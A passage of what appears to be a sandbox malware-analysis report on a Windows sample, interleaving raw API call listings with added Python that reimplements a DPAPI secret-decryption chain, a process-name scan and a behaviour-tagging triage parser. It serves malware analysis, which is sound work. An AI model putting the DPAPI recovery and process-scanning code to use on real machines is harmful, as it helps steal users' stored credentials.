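def narrow_to_ansi(wide, buf_size=0x400, codepage="cp1252"):
    """Mirror WideCharToMultiByte(CP_ACP, ...) into the 0x400-byte buffer the report allocates.
    Assumptions: CP_ACP is cp1252, and a result that does not fit is modelled as None because
    the real call fails with ERROR_INSUFFICIENT_BUFFER rather than truncating."""
    narrow = wide.decode("utf-16-le").encode(codepage, errors="replace")
    return narrow if len(narrow) <= buf_size else None


def recover_secret(encoded):
    """Full chain: base64 text -> DPAPI blob -> UTF-16 plaintext -> ANSI bytes."""
    blob = decode_base64_like_crypt32(encoded)
    if not is_dpapi_blob(blob):
        raise ValueError("not a DPAPI blob")
    return narrow_to_ansi(unprotect(blob))
```

The base64 sample in the checks below is the DPAPI header itself with a line break and a space inserted, which is exactly the kind of input the Crypt32 decoder accepts and a strict decoder rejects; is_dpapi_blob is what lets an analyst tell DPAPI-wrapped material from other base64 payloads in a memory dump before trying to decrypt it.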
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 8bc735220a54d70b7b559c61cb1c4b1a47dfeef873f57ce14c96c07760a5b7c3
                        • Instruction ID: 6b381b59dc27a698d45430495ad75ed8dc448f52725486c11c8987465875de8c
                        • Opcode Fuzzy Hash: 8bc735220a54d70b7b559c61cb1c4b1a47dfeef873f57ce14c96c07760a5b7c3
                        • Instruction Fuzzy Hash: AC014071B45208BBEB10DFD8CD45FEE7778AB44700F108145FB05AA2C0D670AA00DB65
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006E961E
                        • Process32First.KERNEL32(006F0ACA,00000128), ref: 006E9632
                        • Process32Next.KERNEL32(006F0ACA,00000128), ref: 006E9647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 006E965C
                        • CloseHandle.KERNEL32(006F0ACA), ref: 006E967A
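Two details in this function's argument lists are worth reading off: CreateToolhelp32Snapshot is called with 0x2 (TH32CS_SNAPPROCESS, processes only), and Process32First/Next receive a dwSize of 0x128, which is the size of the ANSI PROCESSENTRY32 in a 32-bit process, so szExeFile is an ANSI name and the StrCmpCA that follows compares it case-sensitively against the target string. The Python below is an added example, not the sample's code: it reproduces the snapshot loop through ctypes on Windows, checks the 0x128 figure from the structure layout, and shows the case-sensitivity consequence of StrCmpCA. The /proc-based fallback is a stand-in so the name-matching logic also runs on Linux; the process names in the checks are constructed.

```python
import ctypes
import os
import sys

MAX_PATH = 260
TH32CS_SNAPPROCESS = 0x00000002   # dwFlags value passed to CreateToolhelp32Snapshot in the report


def make_processentry32(ulong_ptr):
    """ANSI PROCESSENTRY32; th32DefaultHeapID is ULONG_PTR, so the layout depends on bitness."""
    class PROCESSENTRY32(ctypes.Structure):
        _fields_ = [
            ("dwSize", ctypes.c_uint32),
            ("cntUsage", ctypes.c_uint32),
            ("th32ProcessID", ctypes.c_uint32),
            ("th32DefaultHeapID", ulong_ptr),
            ("th32ModuleID", ctypes.c_uint32),
            ("cntThreads", ctypes.c_uint32),
            ("th32ParentProcessID", ctypes.c_uint32),
            ("pcPriClassBase", ctypes.c_int32),
            ("dwFlags", ctypes.c_uint32),
            ("szExeFile", ctypes.c_char * MAX_PATH),
        ]
    return PROCESSENTRY32


def processentry32_x86_size():
    """Size of the 32-bit ANSI structure; the report's dwSize of 0x128 is this value."""
    return ctypes.sizeof(make_processentry32(ctypes.c_uint32))


def _snapshot_windows():
    k32 = ctypes.windll.kernel32
    k32.CreateToolhelp32Snapshot.restype = ctypes.c_void_p
    k32.Process32First.argtypes = k32.Process32Next.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    PE32 = make_processentry32(ctypes.c_size_t)   # native ULONG_PTR for the running interpreter
    snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
    if snap is None or snap == ctypes.c_void_p(-1).value:   # INVALID_HANDLE_VALUE
        raise ctypes.WinError()
    entry = PE32()
    entry.dwSize = ctypes.sizeof(PE32)
    names = []
    try:
        ok = k32.Process32First(snap, ctypes.byref(entry))
        while ok:
            names.append(entry.szExeFile.decode("mbcs", "replace"))
            ok = k32.Process32Next(snap, ctypes.byref(entry))
    finally:
        k32.CloseHandle(snap)   # the CloseHandle the report shows at the end of the loop
    return names


def _snapshot_proc():
    """Portable stand-in for the Toolhelp snapshot: /proc/<pid>/comm on Linux. The kernel
    truncates comm to 15 characters, so this only approximates szExeFile."""
    names = []
    if not os.path.isdir("/proc"):
        return names
    for pid in os.listdir("/proc"):
        if pid.isdigit():
            try:
                with open(f"/proc/{pid}/comm", encoding="utf-8", errors="replace") as f:
                    names.append(f.read().strip())
            except OSError:
                continue
    return names


def snapshot_process_names():
    return _snapshot_windows() if sys.platform == "win32" else _snapshot_proc()


def find_process(names, target, case_sensitive=True):
    """StrCmpCA is a case-sensitive byte compare, so the sample only matches an exact spelling
    of szExeFile; StrCmpICA would be the case-insensitive variant."""
    for name in names:
        match = name == target if case_sensitive else name.casefold() == target.casefold()
        if match:
            return name
    return None
```

For an analyst the case-sensitivity matters in both directions: when reproducing which process names trigger the sample's branch, the comparison string must be matched byte for byte, and a tool whose image name differs only in case from what the sample expects is not seen by this check.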
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 84eaf045f562fdb9b8af7a74fb2453188643ae33f12561a0c6d24d3ba930e4ae
                        • Instruction ID: 9a82e4b4a8efabe2db0dada6cf18e1434d98fc1ae9faf1896a9da8b09770c54e
                        • Opcode Fuzzy Hash: 84eaf045f562fdb9b8af7a74fb2453188643ae33f12561a0c6d24d3ba930e4ae
                        • Instruction Fuzzy Hash: 33010C75A15308ABDB15DFA5CD48BEDB7F9EF48300F108199A90596290D7349F40DF61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Uz{$iF7$#;$<}}$<}}
                        • API String ID: 0-2722849775
                        • Opcode ID: ce04776913d1428fb92eb16519f04b4a365c25aa5a4a49e99cdd7b3740ed0f5d
                        • Instruction ID: d3f84ab312a017f9e7264c902ed2649e1dff498843169dc3d356623c728ea6e5
                        • Opcode Fuzzy Hash: ce04776913d1428fb92eb16519f04b4a365c25aa5a4a49e99cdd7b3740ed0f5d
                        • Instruction Fuzzy Hash: 2861D3B39083109BE3146A38EC8577ABBE4EF54320F1B4A3DEAD997780E9755D408787
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,006D5184,40000001,00000000,00000000,?,006D5184), ref: 006E8EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 9808c17d4ac281a4591a594ee132a1f010f317bb9660b8a0d003c315a889c406
                        • Instruction ID: f1b742474e632744b554cde17b898c182e66656d56f3f943982f7727eafc2026
                        • Opcode Fuzzy Hash: 9808c17d4ac281a4591a594ee132a1f010f317bb9660b8a0d003c315a889c406
                        • Instruction Fuzzy Hash: AD111870205388BFDB00CF65E884FAB37AAAF89340F109548F9198B251DB35EC41EB60
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E4E608,00000000,?,006F0E10,00000000,?,00000000,00000000), ref: 006E7A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E7A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E4E608,00000000,?,006F0E10,00000000,?,00000000,00000000,?), ref: 006E7A7D
                        • wsprintfA.USER32 ref: 006E7AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: a3de4fc330f58dc78dbc7d9896fdc4673bdcc9876c1de102783956a9f447395e
                        • Instruction ID: cd89a6e73440a559e75105ed1f82e064792874447a859c0e247c933fb7f0c8e6
                        • Opcode Fuzzy Hash: a3de4fc330f58dc78dbc7d9896fdc4673bdcc9876c1de102783956a9f447395e
                        • Instruction Fuzzy Hash: 2C117CB1A4A218EBEB208B59DC49FA9B778FB04721F1043EAE91A93280D7741E40CB51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: CIm7$_?$hos
                        • API String ID: 0-3641775013
                        • Opcode ID: 680050c52c734e626fd7da9ef63ef5540fc519e3e5b154bb6e99f9a31fddbe81
                        • Instruction ID: e8007252c7a745873017824298094f9b09b15b42e1643b432962aa774a73abae
                        • Opcode Fuzzy Hash: 680050c52c734e626fd7da9ef63ef5540fc519e3e5b154bb6e99f9a31fddbe81
                        • Instruction Fuzzy Hash: E8B208F360C2009FE704AE2DEC8567ABBE6EF94320F16453DEAC5C7744EA3598058697
                        APIs
                        • CoCreateInstance.COMBASE(006EE118,00000000,00000001,006EE108,00000000), ref: 006E3758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006E37B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: 105f133939a7fa42a7f64b21428b9ece6ca8c30d70bc0e59de3d6ec15c91495c
                        • Instruction ID: bbfd77ac55f56e8161cdfe0eaa1c8ef514fc375e7a0a7df0213ca624f1196172
                        • Opcode Fuzzy Hash: 105f133939a7fa42a7f64b21428b9ece6ca8c30d70bc0e59de3d6ec15c91495c
                        • Instruction Fuzzy Hash: F141C670A40A289FDB24DB58CC99B9BB7B5BB48702F4091D8A609A72D0E7716E85CF50
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006D9B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 006D9BA3
                        • LocalFree.KERNEL32(?), ref: 006D9BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: a660a18fd9535349d85081eb2df43e6a49f49432c7ff5878fe31a870d5331c4f
                        • Instruction ID: fdd9c573da48655c46efea5400f7e6034f2fcfd2d312d2c351f9af63e7973dea
                        • Opcode Fuzzy Hash: a660a18fd9535349d85081eb2df43e6a49f49432c7ff5878fe31a870d5331c4f
                        • Instruction Fuzzy Hash: 4911CCB4A01209DFDB04DFA8D985AEE77B5FF88300F108599E91597390D774AE50CF61
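The API listings in the function blocks above are the raw material an analyst turns into triage signals: CreateToolhelp32Snapshot/Process32First/Process32Next/StrCmpCA at ref 006E961E is a process-name scan, CryptBinaryToStringA at 006E8EC0 is called with dwFlags 40000001, GetTimeZoneInformation/wsprintfA at 006E7A7D formats host data, and CryptUnprotectData with LocalAlloc/LocalFree at 006D9B84 is a DPAPI decryption routine. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses blocks written in this report's own `APIs` line format, decodes the CryptBinaryToStringA flag word, and tags each block with a behaviour. The behaviour table and tag names are this example's own assumptions, not Joe Sandbox signatures; the sample input is copied verbatim from the blocks above.

```python
"""Triage helper for Joe Sandbox "APIs" function blocks (added example).

Parses lines such as
    • CryptUnprotectData.CRYPT32(?,00000000,...), ref: 006D9B84
into structured calls, decodes the CryptBinaryToStringA dwFlags word and
tags each block with a behaviour from BEHAVIOURS (an assumed mapping, not
a Joe Sandbox signature).
"""
import re
from dataclasses import dataclass

# One report line: "• <api>.<module>(<args>), ref: <hex>"; wsprintfA.USER32 has no parens.
API_LINE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Assumed API-set -> behaviour mapping for the blocks on this page.
BEHAVIOURS = {
    "process-enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "dpapi-unprotect": {"CryptUnprotectData"},
    "base64-encode": {"CryptBinaryToStringA"},
    "timezone-fingerprint": {"GetTimeZoneInformation"},
}

# CryptBinaryToStringA dwFlags: low bits select the format, top nibble holds modifiers.
CRYPT_STRING_FORMAT = {
    0x0: "CRYPT_STRING_BASE64HEADER", 0x1: "CRYPT_STRING_BASE64",
    0x2: "CRYPT_STRING_BINARY", 0x4: "CRYPT_STRING_HEX",
    0x5: "CRYPT_STRING_HEXASCII", 0xC: "CRYPT_STRING_HEXRAW",
}
CRYPT_STRING_MODIFIERS = {
    0x20000000: "CRYPT_STRING_STRICT",
    0x40000000: "CRYPT_STRING_NOCRLF",
    0x80000000: "CRYPT_STRING_NOCR",
}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple   # int for hex values, None where the sandbox printed '?'
    ref: int      # call-site address inside the dumped image


def parse_args(raw):
    """Turn 'a,b,?' into (int, int, None); no parens or '()' gives ()."""
    if not raw:
        return ()
    return tuple(None if a.strip() == "?" else int(a, 16) for a in raw.split(","))


def parse_api_lines(lines):
    """Extract every ApiCall from a list of report lines."""
    calls = []
    for line in lines:
        m = API_LINE.search(line)
        if m:
            calls.append(ApiCall(m["api"], m["module"], parse_args(m["args"]), int(m["ref"], 16)))
    return calls


def split_blocks(text):
    """A block runs from an 'APIs' header to the next 'Memory Dump Source' header."""
    blocks, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = []
        elif s == "Memory Dump Source":
            if cur is not None:
                blocks.append(parse_api_lines(cur))
            cur = None
        elif cur is not None:
            cur.append(line)
    return blocks


def classify(calls):
    """Behaviour tags whose required API set is fully present in the block."""
    names = {c.api for c in calls}
    return {tag for tag, need in BEHAVIOURS.items() if need <= names}


def decode_crypt_string_flags(flags):
    """Name the format and modifier bits of a CryptBinaryToStringA dwFlags value."""
    fmt = flags & 0x0FFFFFFF
    names = [CRYPT_STRING_FORMAT.get(fmt, f"format_0x{fmt:x}")]
    names += [n for bit, n in sorted(CRYPT_STRING_MODIFIERS.items()) if flags & bit]
    return names


def base64_flags(calls):
    """Decoded dwFlags (3rd argument) of each CryptBinaryToStringA call in a block."""
    return [decode_crypt_string_flags(c.args[2]) for c in calls
            if c.api == "CryptBinaryToStringA" and len(c.args) > 2 and c.args[2] is not None]


def triage(text):
    """One sorted tag list per function block, in report order."""
    return [sorted(classify(calls)) for calls in split_blocks(text)]


# Sample input copied from the report's function blocks above.
SAMPLE_REPORT = """\
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006E961E
• Process32First.KERNEL32(006F0ACA,00000128), ref: 006E9632
• Process32Next.KERNEL32(006F0ACA,00000128), ref: 006E9647
• StrCmpCA.SHLWAPI(?,00000000), ref: 006E965C
• CloseHandle.KERNEL32(006F0ACA), ref: 006E967A
Memory Dump Source
APIs
• CryptBinaryToStringA.CRYPT32(00000000,006D5184,40000001,00000000,00000000,?,006D5184), ref: 006E8EC0
Memory Dump Source
APIs
• GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E4E608,00000000,?,006F0E10,00000000,?,00000000,00000000,?), ref: 006E7A7D
• wsprintfA.USER32 ref: 006E7AB7
Memory Dump Source
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006D9B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 006D9BA3
• LocalFree.KERNEL32(?), ref: 006D9BD3
Memory Dump Source
"""

if __name__ == "__main__":
    for i, (tags, calls) in enumerate(zip(triage(SAMPLE_REPORT), split_blocks(SAMPLE_REPORT))):
        print(f"block {i}: {tags} {base64_flags(calls)}")
```

Run against a saved report, the parser keeps the `ref` addresses so each tag can be traced back to the call site in the dump (for example 006D9B84 for the DPAPI routine); `args` entries that the sandbox could not resolve stay `None` rather than being guessed.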
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
